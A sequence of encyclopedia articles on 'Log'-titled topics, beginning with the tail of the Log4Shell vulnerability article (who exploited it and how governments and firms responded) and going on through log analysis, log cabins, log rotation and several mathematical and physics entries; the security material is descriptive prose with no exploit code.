According to Cloudflare CEO Matthew Prince , evidence of exploitation or of scanning for the exploit goes back as early as 1 December, nine days before it was publicly disclosed. [ 48 ] According to cybersecurity firm GreyNoise, several IP addresses were scraping websites to check for servers that had the vulnerability. [ 49 ] Several botnets began scanning for the vulnerability, including the Muhstik botnet by 10 December, as well as Mirai and Tsunami. [ 7 ] [ 48 ] [ 50 ] Ransomware group Conti was observed using the vulnerability on 17 December. [ 9 ]
Some state-sponsored groups in China and Iran also utilized the exploit according to Check Point, but it is not known if the exploit was used by Israel, Russia or the United States prior to the disclosure of the vulnerability. [ 9 ] [ 19 ] Check Point said that on 15 December 2021, Iran-backed hackers attempted to infiltrate the networks of Israeli businesses and government institutions. [ 9 ]
In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly , described the exploit as "one of the most serious I've seen in my entire career, if not the most serious", explaining that hundreds of millions of devices were affected and advising vendors to prioritize software updates. [ 7 ] [ 51 ] [ 47 ] Civilian agencies contracted by the United States government had until 24 December 2021 to patch vulnerabilities. [ 9 ] On 4 January, the Federal Trade Commission (FTC) stated its intent to pursue companies that fail to take reasonable steps to update used Log4j software. [ 52 ] In a White House meeting, the importance of security maintenance of open-source software – often also carried out largely by few volunteers – to national security was clarified. While some open-source projects have many eyes on them , others do not have many or any people ensuring their security. [ 53 ] [ 54 ]
Germany's Bundesamt für Sicherheit in der Informationstechnik (BSI) designated the exploit as being at the agency's highest threat level, calling it an "extremely critical threat situation" (translated). It also reported that several attacks were already successful and that the extent of the exploit remained hard to assess. [ 55 ] [ 56 ] The Netherlands's National Cyber Security Centre (NCSC) began an ongoing list of vulnerable applications. [ 57 ] [ 58 ]
The Canadian Centre for Cyber Security (CCCS) called on organizations to take immediate action. [ 59 ] The Canada Revenue Agency temporarily shut down its online services after learning of the exploit, while the Government of Quebec closed almost 4,000 of its websites as a "preventative measure." [ 60 ] The Belgian Ministry of Defence experienced a breach attempt and was forced to shut down part of its network. [ 61 ]
The Chinese Ministry of Industry and Information Technology suspended work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months for failing to report the vulnerability to the government first. [ 62 ]
Research conducted by Wiz and EY [ 18 ] showed that 93% of the cloud enterprise environment were vulnerable to Log4Shell. 7% of vulnerable workloads are exposed to the Internet and prone to wide exploitation attempts. According to the research, ten days after vulnerability disclosure (20 December 2021) only 45% of vulnerable workloads were patched on average in cloud environments. Amazon, Google and Microsoft cloud data was affected by Log4Shell. [ 9 ] Microsoft asked Windows and Azure customers to remain vigilant after observing state-sponsored and cyber-criminal attackers probing systems for the Log4j 'Log4Shell' flaw through December 2021. [ 63 ]
The human resource management and workforce management company UKG , one of the largest businesses in the industry, was targeted by a ransomware attack that affected large businesses. [ 20 ] [ 64 ] UKG said it did not have evidence of Log4Shell being exploited in the incident, though analyst Allan Liska from cybersecurity company Recorded Future said there was possibly a connection. [ 64 ]
As larger companies began to release patches for the exploit, the risk for small businesses increased as hackers focused on more vulnerable targets. [ 47 ]
Some personal devices connected to the Internet, such as smart TVs and security cameras, were vulnerable to the exploit. Some software may never get a patch due to discontinued manufacturer support. [ 9 ]
As of 14 December 2021, [update] almost half of all corporate networks globally have been actively probed, with over 60 variants of the exploit having been produced within 24 hours. [ 65 ] Check Point Software Technologies in a detailed analysis described the situation as being "a true cyber-pandemic" and characterizing the potential for damage as being "incalculable". [ 66 ] Several initial advisories exaggerated the amount of packages that were vulnerable, leading to false positives. Most notably, the "log4j-api" package was marked as vulnerable, while in reality further research showed that only the main "log4j-core" package was vulnerable. This was confirmed both in the original issue thread [ 67 ] and by external security researchers. [ 68 ]
Technology magazine Wired wrote that despite the previous "hype" surrounding multiple vulnerabilities, "the Log4j vulnerability ... lives up to the hype for a host of reasons". [ 19 ] The magazine explains that the pervasiveness of Log4j, the vulnerability being difficult to detect by potential targets and the ease of transmitting code to victims created a "combination of severity, simplicity, and pervasiveness that has the security community rattled". [ 19 ] Wired also outlined stages of hackers using Log4Shell; cryptomining groups first using the vulnerability, data brokers then selling a "foothold" to cybercriminals, who finally go on to engage in ransomware attacks, espionage and destroying data. [ 19 ]
Amit Yoran , CEO of Tenable and the founding director of the United States Computer Emergency Readiness Team , stated "[Log4Shell] is by far the single biggest, most critical vulnerability ever", noting that sophisticated attacks were beginning shortly after the bug, saying "We're also already seeing it leveraged for ransomware attacks, which, again, should be a major alarm bell ... We've also seen reports of attackers using Log4Shell to destroy systems without even looking to collect ransom, a fairly unusual behavior". [ 19 ] Sophos 's senior threat researcher Sean Gallagher said, "Honestly, the biggest threat here is that people have already gotten access and are just sitting on it, and even if you remediate the problem somebody's already in the network ... It's going to be around as long as the Internet." [ 19 ]
According to a Bloomberg News report, some anger was directed at Apache's developers at their failure to fix the vulnerability after warnings about exploits of broad classes of software, including Log4j, were made at a 2016 cybersecurity conference. [ 69 ] | https://en.wikipedia.org/wiki/Log4Shell |
In computer log management and intelligence , log analysis (or system and network log analysis ) is an art and science seeking to make sense of computer-generated records (also called log or audit trail records). The process of creating such records is called data logging .
Typical reasons why people perform log analysis are:
Logs are emitted by network devices, operating systems, applications and all manner of intelligent or programmable devices. A stream of messages in time sequence often comprises a log. Logs may be directed to files and stored on disk or directed as a network stream to a log collector.
Log messages must usually be interpreted concerning the internal state of its source (e.g., application) and announce security-relevant or operations-relevant events (e.g., a user login, or a systems error).
Logs are often created by software developers to aid in the debugging of the operation of an application or understanding how users are interacting with a system, such as a search engine. The syntax and semantics of data within log messages are usually application or vendor-specific. The terminology may also vary; for example, the authentication of a user to an application may be described as a log in, a logon, a user connection or an authentication event. Hence, log analysis must interpret messages within the context of an application, vendor, system or configuration to make useful comparisons to messages from different log sources.
Log message format or content may not always be fully documented. A task of the log analyst is to induce the system to emit the full range of messages to understand the complete domain from which the messages must be interpreted.
A log analyst may map varying terminology from different log sources into a uniform, normalized terminology so that reports and statistics can be derived from a heterogeneous environment. For example, log messages from Windows, Unix, network firewalls, and databases may be aggregated into a "normalized" report for the auditor. Different systems may signal different message priorities with a different vocabulary, such as "error" and "warning" vs. "err", "warn", and "critical".
Hence, log analysis practices exist on the continuum from text retrieval to reverse engineering of software.
Pattern recognition is a function of selecting incoming messages and compare with a pattern book to filter or handle different ways.
Normalization is the function of converting message parts to the same format (e.g. common date format or normalized IP address).
Classification and tagging is ordering messages into different classes or tagging them with different keywords for later usage (e.g. filtering or display).
Correlation analysis is a technology of collecting messages from different systems and finding all the messages belonging to one single event (e.g., messages generated by malicious activity on different systems: network devices, firewalls, servers, etc.). It is usually connected with alerting systems.
Artificial Ignorance is a type of machine learning that is a process of discarding log entries that are known to be uninteresting. Artificial ignorance is a method to detect anomalies in a working system. In log analysis, this means recognizing and ignoring the regular, common log messages that result from the normal operation of the system, and therefore are not too interesting. However, new messages that have not appeared in the logs before can signal important events, and should be therefore investigated. [ 1 ] [ 2 ] In addition to anomalies, the algorithm will identify common events that did not occur. For example, a system update that runs every week, has failed to run.
Log Analysis is often compared to other analytics tools such as application performance management (APM) and error monitoring. While much of their functionality is clear overlap, the difference is rooted in process. APM has an emphasis on performance and is utilized most in production. Error monitoring is driven by developers versus operations, and integrates into code in exception handling blocks. | https://en.wikipedia.org/wiki/Log_analysis |
Log area ratios ( LAR ) can be used to represent reflection coefficients (another form for linear prediction coefficients ) for transmission over a channel. While not as efficient as line spectral pairs (LSPs), log area ratios are much simpler to compute. Let r k {\displaystyle r_{k}} be the k th reflection coefficient of a filter, the k th LAR is:
Use of Log Area Ratios have now been mostly replaced by Line Spectral Pairs, but older codecs, such as GSM-FR use LARs.
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Log_area_ratio |
A log cabin is a small log house , especially a minimally finished or less architecturally sophisticated structure. Log cabins have an ancient history in Europe, and in America are often associated with first-generation home building by settlers.
Construction with logs was described by Roman architect Vitruvius Pollio in his architectural treatise De Architectura . He noted that in Pontus in present-day northeastern Turkey , dwellings were constructed by laying logs horizontally overtop of each other and filling in the gaps with "chips and mud". [ 1 ]
Log cabin construction has its roots in Scandinavia and Eastern Europe . Although their precise origin is uncertain, the first log structures were probably being built in Northern Europe by the Bronze Age around 3500 BC. C. A. Weslager describes Europeans as having:
The Finns were accomplished in building several forms of log housing, having different methods of corner timbering, and they utilized both round and hewn logs. Their log building had undergone an evolutionary process from the crude "pirtti"... a small gabled-roof cabin of round logs with an opening in the roof to vent smoke, to more sophisticated squared logs with interlocking double-notch joints, the timber extending beyond the corners. Log saunas or bathhouses of this type are still found in rural Finland.
By stacking tree trunks one on top of another and overlapping the logs at the corners, people made the "log cabin". They developed interlocking corners by notching the logs at the ends, resulting in strong structures that were easier to make weather-tight by inserting moss or other soft material into the joints. As the original coniferous forest extended over the coldest parts of the world, there was a prime need to keep these cabins warm. The insulating properties of the solid wood were a great advantage over a timber frame construction covered with animal skins, felt , boards or shingles . Over the decades, increasingly complex joints were developed to ensure more weather tight joints between the logs, but the profiles were still largely based on the round log. [ 2 ]
A medieval log cabin was considered movable property, evidenced by the relocation of Espåby in 1557, where the buildings were disassembled, transported to a new location, and reassembled. It was also common to replace individual logs damaged by dry rot as necessary.
The Wood Museum in Trondheim , Norway, displays fourteen different traditional profiles, but a basic form of log construction was used all over North Europe and Asia and later imported to America.
Log construction was especially suited to Scandinavia, where straight, tall tree trunks ( pine and spruce ) are readily available. With suitable tools, a log cabin can be erected from scratch in days by a family. As no chemical reaction is involved, such as hardening of mortar, a log cabin can be erected in any weather or season. Many older towns in Northern Scandinavia have been built exclusively out of log houses, which have been decorated by board paneling and wood cuttings. Today, construction of modern log cabins as leisure homes is a fully developed industry in Finland and Sweden. Modern log cabins often feature fiberglass insulation and are sold as prefabricated kits machined in a factory, rather than hand-built in the field like ancient log cabins.
Log cabins are mostly constructed without the use of nails and thus derive their stability from simple stacking, with only a few dowel joints for reinforcement. This is because a log cabin tends to compress slightly as it settles, over a few months or years. Nails would soon be out of alignment and torn out.
Log cabins were largely built from logs laid horizontally and interlocked on the ends with notches. Some log cabins were built without notches and simply nailed together, but this was not as structurally sound.
The most important aspect of cabin building is the site upon which the cabin was built. Site selection was aimed at providing the cabin inhabitants with both sunlight and drainage to make them better able to cope with the rigors of frontier life. Proper site selection placed the home in a location best suited to manage the farm or ranch. When the first pioneers built cabins, they were able to "cherry pick" the best logs for cabins. These were old-growth trees with few limbs (knots) and straight with little taper. Such logs did not need to be hewn to fit well together. Careful notching minimized the size of the gap between the logs and reduced the amount of chinking (sticks or rocks) or daubing (mud) needed to fill the gap. The length of one log was generally the length of one wall, although this was not a limitation for most good cabin builders.
Decisions had to be made about the type of cabin. Styles varied greatly from one part of North America to another: the size of the cabin, the number of stories, type of roof, the orientation of doors and windows all needed to be taken into account when the cabin was designed. In addition, the source of the logs, the source of stone and available labor, either human or animal, had to be considered. If timber sources were further away from the site, the cabin size might be limited.
In North America , cabins were constructed using a variety of notches. One method common in the Ohio River Valley in Southwestern Ohio and Southeastern Indiana is the block house end method, which is exemplified in the David Brown House in Rising Sun, Indiana .
Some older buildings in the Midwestern United States and the Canadian Prairies are log structures covered with clapboards or other materials. 19th-century cabins used as dwellings were occasionally plastered on the interior. The O'Farrell Cabin ( c. 1865 ) in Boise , Idaho , had backed wallpaper used over newspaper. The C.C.A. Christenson Cabin in Ephraim , Utah ( c. 1880 ) was plastered over willow lath. Log cabins reached their peak of complexity and elaboration with the Adirondack-style cabins of the mid-19th century. This style was the inspiration for many United States Park Service lodges built at the end of the 19th century and beginning of the 20th century.
Log cabin building never died out or fell out of favor. It was surpassed by the needs of a growing urban United States. During the 1930s and the Great Depression , the Roosevelt administration directed the Civilian Conservation Corps to build log lodges throughout the west for use by the Forest Service and the National Park Service . Timberline Lodge on Mount Hood in Oregon was such a log structure, and it was dedicated by President Franklin D. Roosevelt . In 1930, the world's largest log cabin was constructed at a private resort in Montebello , Quebec , Canada . Often described as a log château, it serves as the Château Montebello hotel.
The modern version of a log cabin is the log home , which is a house built usually from milled logs. The logs are visible on the exterior and sometimes interior of the house. These cabins are mass manufactured, traditionally in Scandinavian countries and increasingly in Eastern Europe . Squared milled logs are precut for easy assembly. Log homes are popular in rural areas, and even in some suburban locations. In many resort communities in the Western United States , homes of log and stone measuring over 3,000 sq ft (280 m 2 ) are not uncommon. These "kit" log homes are one of the largest consumers of logs in the Western United States.
In the United States, log homes have embodied a traditional approach to home building, one that has resonated throughout American history . Log homes represent a technology that allows a home to be built with a high degree of sustainability . They are frequently considered to be on the leading edge of the green building movement.
Crib barns were a popular type of barn found throughout the American Southern and Southeastern regions . Crib barns were especially ubiquitous in the Appalachian and Ozark Mountain states of North Carolina , Virginia , Kentucky , Tennessee , and Arkansas . In Europe , modern log cabins are often built in gardens and used as summerhouses, home offices, or as an additional room in the garden. Summer houses and cottages are often built from logs in Northern Europe .
Chinking refers to a broad range of mortar or other infill materials used between the logs in the construction of log cabins and other log-walled structures. Traditionally, dried mosses, such as Pleurozium schreberi or Hylocomium splendens , were used in the Nordic countries as an insulator between logs. In the United States, Chinks were small stones or wood or corn cobs stuffed between the logs.
In the United States, settlers may have first constructed log cabins by 1640. Historians believe that the first log cabins built in North America were in the Swedish colony of New Sweden along the Delaware River and Brandywine River valleys.
Most of the settlers were actually Forest Finns , a heavily oppressed Finnish ethnic group originally from Savonia and Tavastia , who starting from the 1500s were displaced or persuaded to go inhabit and practice slash and burn agriculture (which they were famous for in eastern Finland) in the deep forests of inland Sweden and Norway, during Sweden's 600+ year colonial rule over Finland, who since 1640 were being captured and displaced to the colony. [ 3 ]
After arriving, they would escape the Fort Christina center where the Swedes lived, to go and live in the forest as they did back home. They encountered the Lenape Indian tribe, with whom they found many cultural similarities, including slash and burn agriculture, sweat lodges and saunas, and a love of forests, and they ended up living alongside and even culturally assimilating with them [ 4 ] (they are the earlier and lesser-known Findian tribe, [ 5 ] [ 6 ] being overshadowed by the Ojibwe Findians of Minnesota, Michigan and Ontario, Canada). In those forests, the first log cabins of America were built, using traditional Finnish methods. Even though New Sweden existed only briefly before it was absorbed by the Dutch colony of New Netherland , which was eventually taken over by the English, these quick and easy construction techniques of the Finns not only remained, but spread. [ citation needed ]
Germans and Ukrainians also used this technique. The contemporaneous British settlers had no tradition of building with logs, but they quickly adopted the method. The first English settlers did not widely use log cabins, building in forms more traditional to them. [ 7 ] Few log cabins dating from the 18th century still stand, but they were often not intended as permanent dwellings. Possibly the oldest surviving log house in the United States is the C. A. Nothnagle Log House ( c. 1640 ) in New Jersey. Settlers often built log cabins as temporary homes to live in while constructing larger, permanent houses; then they either demolished the log structures or used them as outbuildings, such as barns or chicken coops . [ citation needed ]
Log cabins were sometimes hewn on the outside so that siding might be applied; they also might be hewn inside and covered with a variety of materials, ranging from plaster over lath to wallpaper . [ citation needed ]
Log cabins were constructed with either a purlin roof structure or a rafter roof structure. A purlin roof consists of horizontal logs that are notched into the gable-wall logs. The latter are progressively shortened to form the characteristic triangular gable end. The steepness of the roof was determined by the reduction in size of each gable-wall log as well as the total number of gable-wall logs. Flatter roofed cabins might have had only 2 or 3 gable-wall logs while steeply pitched roofs might have had as many gable-wall logs as a full story. Issues related to eave overhang and a porch also influenced the layout of the cabin.
The decision about roof type often was based on the material for roofing like bark. Milled lumber was usually the most popular choice for rafter roofs in areas where it was available. These roofs typify many log cabins built in the 20th century, having full-cut 2×4 rafters covered with pine and cedar shingles. The purlin roofs found in rural settings and locations, where milled lumber was not available, often were covered with long hand-split shingles.
The log cabin has been a symbol of humble origins in U.S. politics since the early 19th century. At least seven U.S. presidents were born in log cabins, including Andrew Jackson , James K. Polk , Millard Fillmore , Franklin Pierce , James Buchanan , Abraham Lincoln , and James A. Garfield . [ 8 ] Although William Henry Harrison was not born in a log cabin, he and the Whigs were among the first to use them during the 1840 presidential election as a symbol to show Americans that he was a man of the people. [ 9 ] Other candidates followed Harrison's example, making the idea of a log cabin a recurring theme in U.S. presidential campaigns. [ 10 ]
More than a century after Harrison, Adlai Stevenson II said, "I wasn't born in a log cabin. I didn't work my way through school nor did I rise from rags to riches, and there's no use trying to pretend I did." [ 10 ] Stevenson lost the 1952 presidential election in a landslide to Dwight D. Eisenhower .
A popular children's toy in the United States is Lincoln Logs , which are various notched dowel rods that can be fitted together to build scale miniature-sized structures. | https://en.wikipedia.org/wiki/Log_cabin |
Log management is the process for generating, transmitting, storing, accessing, and disposing of log data. A log data (or logs ) is composed of entries (records), and each entry contains information related to a specific event that occur within an organization's computing assets, including physical and virtual platforms, networks, services, and cloud environments. [ 1 ]
The process of log management generally breaks down into: [ 2 ]
The primary drivers for log management implementations are concerns about security , [ 3 ] system and network operations (such as system or network administration ) and regulatory compliance. Logs are generated by nearly every computing device, and can often be directed to different locations both on a local file system or remote system.
Effectively analyzing large volumes of diverse logs can pose many challenges, such as:
Users and potential users of log management may purchase complete commercial tools or build their own log-management and intelligence tools, assembling the functionality from various open-source components, or acquire (sub-)systems from commercial vendors. Log management is a complicated process and organizations often make mistakes while approaching it. [ 4 ]
Logging can produce technical information usable for the maintenance of applications or websites. It can serve:
Suggestions were made [ by whom? ] to change the definition of logging. This change would keep matters both purer and more easily maintainable:
One view [ citation needed ] of assessing the maturity of an organization in terms of the deployment of log-management tools might use [ original research? ] successive levels such as: | https://en.wikipedia.org/wiki/Log_management |
Log reduction is a measure of how thoroughly a decontamination process reduces the concentration of a contaminant .
It is defined as the common logarithm of the ratio of the levels of contamination before and after the process, so an increment of 1 corresponds to a reduction in concentration by a factor of 10.
In general, an n -log reduction means that the concentration of remaining contaminants is only 10 − n times that of the original. So for example, a 0-log reduction is no reduction at all, while a 1-log reduction corresponds to a reduction of 90 percent from the original concentration, and a 2-log reduction corresponds to a reduction of 99 percent from the original concentration. [ 1 ]
Let c b and c a be the numerical values of the concentrations of a given contaminant, respectively before and after treatment, following a defined process.
It is irrelevant in what units these concentrations are given, provided that both use the same units.
Then an R -log reduction is achieved, where
For the purpose of presentation, the value of R is rounded down to a desired precision, usually to a whole number.
Let the concentration of some contaminant be 580 ppm before and 0.725 ppm after treatment. Then
Rounded down, R is 2, so a 2-log reduction is achieved.
Conversely, an R -log reduction means that a reduction by a factor of 10 R has been achieved.
Reduction is often expressed as a percentage . The closer it is to 100%, the better.
Letting c b and c a be as before, a reduction by P % is achieved, where
Let, as in the earlier example, the concentration of some contaminant be 580 ppm before and 0.725 ppm after treatment. Then
So this is (better than) a 99% reduction, but not yet quite a 99.9% reduction.
The following table summarizes the most common cases.
In general, if R is a whole number, an R -log reduction corresponds to a percentage reduction with R leading digits "9" in the percentage (provided that it is at least 10%). | https://en.wikipedia.org/wiki/Log_reduction |
In information technology , log rotation is an automated process used in system administration in which log files are compressed, moved ( archived ), renamed or deleted once they are too old or too big (there can be other metrics that can apply here).
New incoming log data is directed into a new fresh file (at the same location). [ 1 ]
The main purpose of log rotation is to restrict the volume of the log data to avoid overflowing the record store, while keeping the log files small enough so viewers can still open them.
Servers which run large applications, such as LAMP stacks , often log every request: in the face of bulky logs, log rotation provides a way to limit the total size of the logs retained while still allowing analysis of recent events.
Even though some arguments in favor of log rotation imply that maintaining smaller files increases writing performance, the size of a file doesn’t affect its writing performance. The reason is that in most modern filesystem implementations, the kernel knows the size of a file, and appending data can happen after performing a seek syscall to position the pointer at the end of the file which is a constant time operation.
In Linux log rotation is typically performed using the logrotate command . [ 2 ] [ 3 ] The command can be used to email logs to a systems administrator after log rotation. Dated logs may also be compressed .
In FreeBSD and macOS the newsyslog command is used. [ 4 ] It has the ability to trigger rotation based on file size, time or interval (or any combination thereof). It can compress the archives and send a signal to a process to reset logging.
The command is often run as a cron job, which has the effect of fully automatic log rotation.
Typically, a new logfile is created periodically, and the old logfile is renamed by appending a "1" to the name. Each time a new log file is started, the numbers in the file names of old logfiles are increased by one, so the files "rotate" through the numbers (thus the name "log rotation"). Old logfiles whose number exceeds a threshold can then be deleted or archived off-line to save space.
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Log_rotation |
The log sum inequality is used for proving theorems in information theory .
Let a 1 , … , a n {\displaystyle a_{1},\ldots ,a_{n}} and b 1 , … , b n {\displaystyle b_{1},\ldots ,b_{n}} be nonnegative numbers. Denote the sum of all a i {\displaystyle a_{i}} s by a {\displaystyle a} and the sum of all b i {\displaystyle b_{i}} s by b {\displaystyle b} . The log sum inequality states that
with equality if and only if a i b i {\displaystyle {\frac {a_{i}}{b_{i}}}} are equal for all i {\displaystyle i} , in other words a i = c b i {\displaystyle a_{i}=cb_{i}} for all i {\displaystyle i} . [ 1 ]
(Take a i log a i b i {\displaystyle a_{i}\log {\frac {a_{i}}{b_{i}}}} to be 0 {\displaystyle 0} if a i = 0 {\displaystyle a_{i}=0} and ∞ {\displaystyle \infty } if a i > 0 , b i = 0 {\displaystyle a_{i}>0,b_{i}=0} . These are the limiting values obtained as the relevant number tends to 0 {\displaystyle 0} .) [ 1 ]
Notice that after setting f ( x ) = x log x {\displaystyle f(x)=x\log x} we have
where the inequality follows from Jensen's inequality since b i b ≥ 0 {\displaystyle {\frac {b_{i}}{b}}\geq 0} , ∑ i = 1 n b i b = 1 {\displaystyle \sum _{i=1}^{n}{\frac {b_{i}}{b}}=1} , and f {\displaystyle f} is convex. [ 1 ]
The inequality remains valid for n = ∞ {\displaystyle n=\infty } provided that a < ∞ {\displaystyle a<\infty } and b < ∞ {\displaystyle b<\infty } . [ citation needed ] The proof above holds for any function g {\displaystyle g} such that f ( x ) = x g ( x ) {\displaystyle f(x)=xg(x)} is convex, such as all continuous non-decreasing functions. Generalizations to non-decreasing functions other than the logarithm is given in Csiszár, 2004.
Another generalization is due to Dannan, Neff and Thiel, who showed that if a 1 , a 2 ⋯ a n {\displaystyle a_{1},a_{2}\cdots a_{n}} and b 1 , b 2 ⋯ b n {\displaystyle b_{1},b_{2}\cdots b_{n}} are positive real numbers with a 1 + a 2 ⋯ + a n = a {\displaystyle a_{1}+a_{2}\cdots +a_{n}=a} and b 1 + b 2 ⋯ + b n = b {\displaystyle b_{1}+b_{2}\cdots +b_{n}=b} , and k ≥ 0 {\displaystyle k\geq 0} , then ∑ i = 1 n a i log ( a i b i + k ) ≥ a log ( a b + k ) {\displaystyle \sum _{i=1}^{n}a_{i}\log \left({\frac {a_{i}}{b_{i}}}+k\right)\geq a\log \left({\frac {a}{b}}+k\right)} . [ 2 ]
The log sum inequality can be used to prove inequalities in information theory. Gibbs' inequality states that the Kullback-Leibler divergence is non-negative, and equal to zero precisely if its arguments are equal. [ 3 ] One proof uses the log sum inequality.
with equality if and only if p i = q i {\displaystyle p_{i}=q_{i}} for all i (as both P {\displaystyle P} and Q {\displaystyle Q} sum to 1).
The inequality can also prove convexity of Kullback-Leibler divergence. [ 4 ] | https://en.wikipedia.org/wiki/Log_sum_inequality |
In theoretical physics , the logarithmic Schrödinger equation (sometimes abbreviated as LNSE or LogSE ) is one of the nonlinear modifications of Schrödinger's equation , first proposed by Gerald H. Rosen in its relativistic version (with D'Alembertian instead of Laplacian and first-order time derivative) in 1969. [ 1 ] It is a classical wave equation with applications to extensions of quantum mechanics , [ 2 ] [ 3 ] [ 4 ] quantum optics , [ 5 ] nuclear physics , [ 6 ] [ 7 ] transport and diffusion phenomena, [ 8 ] [ 9 ] open quantum systems and information theory , [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] effective quantum gravity and physical vacuum models [ 16 ] [ 17 ] [ 18 ] [ 19 ] and theory of superfluidity and Bose–Einstein condensation . [ 20 ] [ 21 ] It is an example of an integrable model .
The logarithmic Schrödinger equation is a partial differential equation . In mathematics and mathematical physics one often uses its dimensionless form: i ∂ ψ ∂ t + ∇ 2 ψ + ψ ln | ψ | 2 = 0. {\displaystyle i{\frac {\partial \psi }{\partial t}}+\nabla ^{2}\psi +\psi \ln |\psi |^{2}=0.} for the complex-valued function ψ = ψ ( x , t ) of the particles position vector x = ( x , y , z ) at time t , and ∇ 2 ψ = ∂ 2 ψ ∂ x 2 + ∂ 2 ψ ∂ y 2 + ∂ 2 ψ ∂ z 2 {\displaystyle \nabla ^{2}\psi ={\frac {\partial ^{2}\psi }{\partial x^{2}}}+{\frac {\partial ^{2}\psi }{\partial y^{2}}}+{\frac {\partial ^{2}\psi }{\partial z^{2}}}} is the Laplacian of ψ in Cartesian coordinates . The logarithmic term ψ ln | ψ | 2 {\displaystyle \psi \ln |\psi |^{2}} has been shown indispensable in determining the speed of sound scales as the cubic root of pressure for Helium-4 at very low temperatures. [ 22 ] This logarithmic term is also needed for cold sodium atoms. [ 23 ] In spite of the logarithmic term, it has been shown in the case of central potentials, that even for non-zero angular momentum, the LogSE retains certain symmetries similar to those found in its linear counterpart, making it potentially applicable to atomic and nuclear systems. [ 24 ]
The relativistic version of this equation can be obtained by replacing the derivative operator with the D'Alembertian , similarly to the Klein–Gordon equation . Soliton-like solutions known as Gaussons figure prominently as analytical solutions to this equation for a number of cases. | https://en.wikipedia.org/wiki/Logarithmic_Schrödinger_equation |
In mathematics , specifically in calculus and complex analysis , the logarithmic derivative of a function f is defined by the formula f ′ f {\displaystyle {\frac {f'}{f}}} where f ′ {\displaystyle f'} is the derivative of f . [ 1 ] Intuitively, this is the infinitesimal relative change in f ; that is, the infinitesimal absolute change in f, namely f ′ , {\displaystyle f',} scaled by the current value of f.
When f is a function f ( x ) of a real variable x , and takes real , strictly positive values, this is equal to the derivative of ln( f ), or the natural logarithm of f . This follows directly from the chain rule : [ 1 ] d d x ln f ( x ) = 1 f ( x ) d f ( x ) d x {\displaystyle {\frac {d}{dx}}\ln f(x)={\frac {1}{f(x)}}{\frac {df(x)}{dx}}}
Many properties of the real logarithm also apply to the logarithmic derivative, even when the function does not take values in the positive reals. For example, since the logarithm of a product is the sum of the logarithms of the factors, we have ( log u v ) ′ = ( log u + log v ) ′ = ( log u ) ′ + ( log v ) ′ . {\displaystyle (\log uv)'=(\log u+\log v)'=(\log u)'+(\log v)'.} So for positive-real-valued functions, the logarithmic derivative of a product is the sum of the logarithmic derivatives of the factors. But we can also use the Leibniz law for the derivative of a product to get ( u v ) ′ u v = u ′ v + u v ′ u v = u ′ u + v ′ v . {\displaystyle {\frac {(uv)'}{uv}}={\frac {u'v+uv'}{uv}}={\frac {u'}{u}}+{\frac {v'}{v}}.} Thus, it is true for any function that the logarithmic derivative of a product is the sum of the logarithmic derivatives of the factors (when they are defined).
A corollary to this is that the logarithmic derivative of the reciprocal of a function is the negation of the logarithmic derivative of the function: ( 1 / u ) ′ 1 / u = − u ′ / u 2 1 / u = − u ′ u , {\displaystyle {\frac {(1/u)'}{1/u}}={\frac {-u'/u^{2}}{1/u}}=-{\frac {u'}{u}},} just as the logarithm of the reciprocal of a positive real number is the negation of the logarithm of the number. [ citation needed ]
More generally, the logarithmic derivative of a quotient is the difference of the logarithmic derivatives of the dividend and the divisor: ( u / v ) ′ u / v = ( u ′ v − u v ′ ) / v 2 u / v = u ′ u − v ′ v , {\displaystyle {\frac {(u/v)'}{u/v}}={\frac {(u'v-uv')/v^{2}}{u/v}}={\frac {u'}{u}}-{\frac {v'}{v}},} just as the logarithm of a quotient is the difference of the logarithms of the dividend and the divisor.
Generalising in another direction, the logarithmic derivative of a power (with constant real exponent) is the product of the exponent and the logarithmic derivative of the base: ( u k ) ′ u k = k u k − 1 u ′ u k = k u ′ u , {\displaystyle {\frac {(u^{k})'}{u^{k}}}={\frac {ku^{k-1}u'}{u^{k}}}=k{\frac {u'}{u}},} just as the logarithm of a power is the product of the exponent and the logarithm of the base.
In summary, both derivatives and logarithms have a product rule , a reciprocal rule , a quotient rule , and a power rule (compare the list of logarithmic identities ); each pair of rules is related through the logarithmic derivative.
Logarithmic derivatives can simplify the computation of derivatives requiring the product rule while producing the same result. The procedure is as follows: Suppose that f ( x ) = u ( x ) v ( x ) {\displaystyle f(x)=u(x)v(x)} and that we wish to compute f ′ ( x ) {\displaystyle f'(x)} . Instead of computing it directly as f ′ = u ′ v + v ′ u {\displaystyle f'=u'v+v'u} , we compute its logarithmic derivative. That is, we compute: f ′ f = u ′ u + v ′ v . {\displaystyle {\frac {f'}{f}}={\frac {u'}{u}}+{\frac {v'}{v}}.}
Multiplying through by ƒ computes f ′ : f ′ = f ⋅ ( u ′ u + v ′ v ) . {\displaystyle f'=f\cdot \left({\frac {u'}{u}}+{\frac {v'}{v}}\right).}
This technique is most useful when ƒ is a product of a large number of factors. This technique makes it possible to compute f ′ by computing the logarithmic derivative of each factor, summing, and multiplying by f .
For example, we can compute the logarithmic derivative of e x 2 ( x − 2 ) 3 ( x − 3 ) ( x − 1 ) − 1 {\displaystyle e^{x^{2}}(x-2)^{3}(x-3)(x-1)^{-1}} to be 2 x + 3 x − 2 + 1 x − 3 − 1 x − 1 {\displaystyle 2x+{\frac {3}{x-2}}+{\frac {1}{x-3}}-{\frac {1}{x-1}}} .
The logarithmic derivative idea is closely connected to the integrating factor method for first-order differential equations . In operator terms, write D = d d x {\displaystyle D={\frac {d}{dx}}} and let M denote the operator of multiplication by some given function G ( x ). Then M − 1 D M {\displaystyle M^{-1}DM} can be written (by the product rule ) as D + M ∗ {\displaystyle D+M^{*}} where M ∗ {\displaystyle M^{*}} now denotes the multiplication operator by the logarithmic derivative G ′ G {\displaystyle {\frac {G'}{G}}}
In practice we are given an operator such as D + F = L {\displaystyle D+F=L} and wish to solve equations L ( h ) = f {\displaystyle L(h)=f} for the function h , given f . This then reduces to solving G ′ G = F {\displaystyle {\frac {G'}{G}}=F} which has as solution exp ( ∫ F ) {\displaystyle \exp \textstyle (\int F)} with any indefinite integral of F . [ citation needed ]
